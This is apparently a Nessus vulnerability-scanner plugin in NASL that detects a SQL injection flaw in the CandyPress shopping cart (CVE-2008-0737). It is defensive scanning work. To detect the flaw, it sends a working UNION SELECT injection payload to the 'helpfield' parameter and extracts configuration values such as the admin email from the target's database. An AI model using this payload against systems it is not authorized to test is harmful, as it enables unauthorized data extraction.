#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(30107);
  script_version("$Revision: 1.2 $");

  script_cve_id("CVE-2008-0737");
  script_bugtraq_id(27454);
  script_xref(name:"milw0rm", value:"4988");
  script_xref(name:"Secunia", value:"28662");

  script_name(english:"CandyPress helpfield Parameter SQL Injection Vulnerability");
  script_summary(english:"Tries to extract configuration data from database");

  desc = "
Synopsis :

The remote web server contains an ASP script that is susceptible to a
SQL injection attack. 

Description :

The remote host is running CandyPress, a commercial shopping cart
script written in ASP. 

The version of CandyPress installed on the remote host fails to
sanitize user-supplied input to the 'helpfield' parameter of the
'admin/utilities_ConfigHelp.asp' script before using it to perform
database queries.  An unauthenticated attacker may be able to exploit
this issue to manipulate database queries to disclose sensitive
information, bypass authentication, or even attack the underlying
database. 

Note that this version may also be affected by several other SQL
injection, cross-site scripting, and information disclosure
vulnerabilities, although Nessus did not explicitly check for them. 

See also :

http://archives.neohapsis.com/archives/bugtraq/2008-01/0369.html
http://www.candypress.com/CPforum/forum_posts.asp?TID=10630&PN=1

Solution :

Upgrade to CandyPress version 4.1.1.27 or later.

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_asp(port:port)) exit(0);


# Loop through various directories.
if (thorough_tests) dirs = make_list("/candypress", "/store", "/shop", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to pull some config info out of CandyPress' database.
  if (thorough_tests) configvars = make_list("pEmailAdmin", "storeVersion");
  else configvars = make_list("storeVersion");

  info = "";
  foreach configvar (configvars)
  {
    exploit = string("-1') union select configVal as configHelp from storeAdmin where configVar='", configvar, "' or ('1'='2");

    req = http_get(
      item:string(
        dir, "/admin/utilities_ConfigHelp.asp?",
        "helpfield=", str_replace(find:" ", replace:"%20", string:exploit)
      ), 
      port:port
    );
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    if (
      "Store Configuration - Help" >< res &&
      "DESCRIPTION:" >< res
    )
    {
      configval = strstr(res, "DESCRIPTION:");
      configval = strstr(configval, '\r\n') - '\r\n';
      if (configval) configval = configval - strstr(configval, "<br>");
      if (configval) info += '  ' + configvar + ' : ' + configval + '\n';
    }
  }

  if (info)
  {
    if (report_verbosity)
    {
      report = string(
        "\n",
        "Nessus extracted the following information about the configuration\n",
        "of CandyPress on the remote host :\n",
        "\n",
        info
      );
      security_hole(port:port, extra:report);
    }
    else security_hole(port);

    exit(0);
  }
}
